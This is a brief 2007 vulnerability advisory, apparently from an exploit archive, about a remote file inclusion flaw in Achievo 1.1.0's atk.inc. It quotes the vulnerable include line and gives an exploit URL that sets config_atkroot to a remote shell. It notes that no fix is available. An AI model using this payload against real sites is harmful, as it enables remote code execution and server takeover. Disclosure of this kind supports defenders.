Achievo 1.1.0 (atk.inc config_atkroot) Remote File Inclusion Vulnerability

2007-05-15 00:00:00

## Achievo 1.1.0(index.php) Remote File Include Vulnerability ##

#Found by : Katatafish ([email protected])

#Download http://www.achievo.org/files/achievo-stable-1.1.0.tar.gz

# File: ./atk.inc
include_once($config_atkroot."atk/modules/class.atkmodule.inc");

# Exploit http://site.com/[path]/index.php?config_atkroot=SHELL

#

Fixes

No fixes

In order to submit a new fix you need to be registered.